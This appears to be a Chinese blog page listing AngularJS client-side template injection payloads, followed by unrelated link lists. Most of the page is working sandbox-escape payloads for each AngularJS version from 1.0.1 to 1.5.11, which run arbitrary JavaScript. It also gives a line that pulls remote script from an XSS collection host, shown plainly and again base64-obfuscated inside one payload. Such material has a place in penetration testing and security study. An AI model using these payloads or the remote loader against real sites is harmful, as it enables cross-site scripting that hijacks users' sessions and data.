<html>

<head>

<meta charset="utf-8">

<script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js"></script>

</head>

<body>

<div ng-app>{{ 7+7 }}</div>

</body>

</html>
http://www.runoob.com/try/try.php?filename=try_ng_intro
Bypass Payload



下面是一些 AngularJS 绕过的 Payload:

1.0.1 - 1.1.5

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6 - 1.2.18

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

1.3.0

{{!ready && (ready = true) && (

!call

? $$watchers[0].get(toString.constructor.prototype)

: (a = apply) &&

(apply = constructor) &&

(valueOf = call) &&

(''+''.toString(

'F = Function.prototype;' +

'F.apply = F.a;' +

'delete F.a;' +

'delete F.valueOf;' +

'alert(1);'

))

);}}

1.3.1 - 1.3.2

{{

{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=''.valueOf;

 $eval('x=alert(1)//');

}}

1.3.3 - 1.3.18

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=[].join;

 $eval('x=alert(1)//'); }}

1.3.19

{{

'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;

 $eval('x=alert(1)//');

}}

1.3.20

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
$.getScript('http://xsspt.com/xxxx');

编码之后

eval(atob('JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20veHh4eCcpOw=='));

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20veHh4eCcpOw


1.5.0 - 1.5.8

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}    ---->没有测试成功

{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(42),a')}}');}}   此条在liveoverflow.com测试成功

1.5.9 - 1.5.11

{{

 c=''.sub.call;b=''.sub.bind;a=''.sub.apply;

 c.$apply=$apply;c.$eval=b;op=$root.$$phase;

 $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;

 C=c.$apply(c);$root.$$phase=op;$root.$digest=od;

 B=C(b,c,b);$evalAsync("

 astNode=pop();astNode.type='UnaryExpression';

 astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';

 astNode.argument={type:'Identifier',name:'foo'};

");

 m1=B($$asyncQueue.pop().expression,null,$root);

 m2=B(C,null,m1);[].push.apply=m2;a=''.sub;

 $eval('a(b.c)');[].push.apply=a;

}}


												


											
Client-Side Template Injection with AngularJS的更多相关文章
	

    
								
  1. Portswigger web security academy:Server-side template injection(SSTI)
		
    Portswigger web security academy:Server-side template injection(SSTI) 目录 Portswigger web security ac ...
    
		
    2. 
						
  2. markdown反射型xss漏洞复现
		
    markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到Hack ...
    
		
    3. 
						
  3. 先知xss挑战赛学习笔记
		
    xss游戏 游戏地址:http://ec2-13-58-146-2.us-east-2.compute.amazonaws.com/ LEMON参考wp地址 1. 文件上传 源码如下 <?php ...
    
		
    4. 
						
  4. web全套资料 干货满满 各种文章详解
		
    sql注入l MySqlMySQL False注入及技巧总结MySQL 注入攻击与防御sql注入学习总结SQL注入防御与绕过的几种姿势MySQL偏门技巧mysql注入可报错时爆表名.字段名.库名高级S ...
    
		
    5. 
						
  5. ref:web security最新学习资料收集
		
    ref:https://chybeta.github.io/2017/08/19/Web-Security-Learning/ ref:https://github.com/CHYbeta/Web-S ...
    
		
    6. 
						
  6. Web-Security-Learning
		
    Web Security sql注入 MySql MySQL False 注入及技巧总结 MySQL 注入攻击与防御 sql注入学习总结 SQL注入防御与绕过的几种姿势 MySQL偏门技巧 mysql ...
    
		
    7. 
						
  7. AngularJS 特性—SinglePage、template、Controller
		
    单页Web应用(SinglePage) 顾名思义,只使用一个页面的Web应用程序.单页面应用是指用户通过浏览器加载独立的HTML页面,Ajax加载数据页面无刷新,实现操作各种操作. 模板(templa ...
    
		
    8. 
						
  8. OData Client Code Generator
		
    转发. [Tutorial & Sample] How to use OData Client Code Generator to generate client-side proxy cla ...
    
		
    9. 
						
  9. AngularJS Directive 学习笔记
		
    指令 Directive 指令要点 大漠老师的教学节点 解析最简单的指令 hello: 匹配模式 restrict 解析最简单的指令 hello: template.tempmlateUrl.$tem ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. RHEL6 删除软RAID
			
    停止使用RAID: 1.umount raid组上的硬盘的所用的分区 若使用raid组创建vg,需要删除或去激活VG 2.停止raid服务 mdadm -S /dev/md0 3.清除MBR # md ...
    
			
    2. 
						
  2. yum源   Python3  Django  mysql安装
			
    yum 源安装 yum源位置: yum源仓库的地址 在/etc/yum.repos.d/,并且只能读出第一层的repo文件 yum仓库的文件都是以.repo结尾的 linux软件包管理 yum工具如同 ...
    
			
    3. 
						
  3. golang json 读写配置文件
			
    package main import ( "encoding/json" "fmt" "os" ) type configuration  ...
    
			
    4. 
						
  4. drawer
			
    import 'package:flutter/material.dart'; class DrawerPage extends StatefulWidget { @override _DrawerP ...
    
			
    5. 
						
  5. ELK的安装
			
    首先得安装好Elasticsearch.Kibana和Logstash(这里全部使用rpm安装的是6.4.2版本,而且都是单机安装,暂时没有考虑分布式安装.) 服务器内存要求至少为4G,下图为运行起来 ...
    
			
    6. 
						
  6. 如何展开Linux Memory Management学习?
			
    Linux的进程和内存是两座大山,没有翻过这两座大山对于内核的理解始终是不完整的. 关于Linux内存管理,在开始之前做些准备工作. 首先bing到了Quora的<How can one rea ...
    
			
    7. 
						
  7. System.Threading.Timer如何正确地被Dispose
			
    System.Threading.Timer是.NET中一个定时触发事件处理方法的类(本文后面简称Timer),它背后依靠的是.NET的线程池(ThreadPool),所以当Timer在短时间内触发了 ...
    
			
    8. 
						
  8. Socket之listen() receive()
			
    socket.listen([backlog]) 相比listen方法,它俩就好理解多了,一个是Client用于连接Server的方法,一个是Server用于接收Client的连接申请的方法.  但事 ...
    
			
    9. 
						
  9. TypeError: 'Item' object has no attribute '__getitem__'
			
    Error Msg: Traceback (most recent call last): File "start.py", line 8, in <module> E ...
    
			
    10. 
						
  10. pyspider安装出现问题参考
			
    File "c:\users\13733\appdata\local\programs\python\python37\lib\site-packages\pyspider\run.py&q ...
    
			
    11.